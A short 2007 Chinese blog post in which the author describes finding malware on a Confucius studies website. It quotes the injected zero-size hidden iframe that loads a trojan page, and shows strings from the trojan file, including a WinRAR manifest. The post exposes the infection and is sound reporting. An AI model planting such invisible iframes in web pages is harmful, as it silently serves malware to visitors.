孔子在线地址:http://confucian.ruc.edu.cn/
本来是要看看孔子老人家的,结果我的装备发出警告,有马。
查看原文件搜索frame,找到一个宽0高0的框架,
<iframe src="chn/conn.htm" width="0" height="0"></iframe>
无疑,是个木马了。
手头没工具,无法对木马进行分析,不过看似一个弱智弱智的东东了
用记事本把该自动要执行的木马打开,发现如下字段
[GOLDSUN@84823714.qq]
<?xml version="1.0" encoding="UTF-8" standalone="yes"?> <assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"> <assemblyIdentity version="1.0.0.0" processorArchitecture="X86" name="Roshal.WinRAR.WinRAR" type="win32" /> <description>WinRAR archiver.</description> <dependency> <dependentAssembly> <assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="X86" publicKeyToken="6595b64144ccf1df" language="*" /> </dependentAssembly> </dependency> </assembly>
这样看来,儒家孔子都在网上散毒了,厉害,先进文化。
张建伟
2007-01-15
没有评论:
发表评论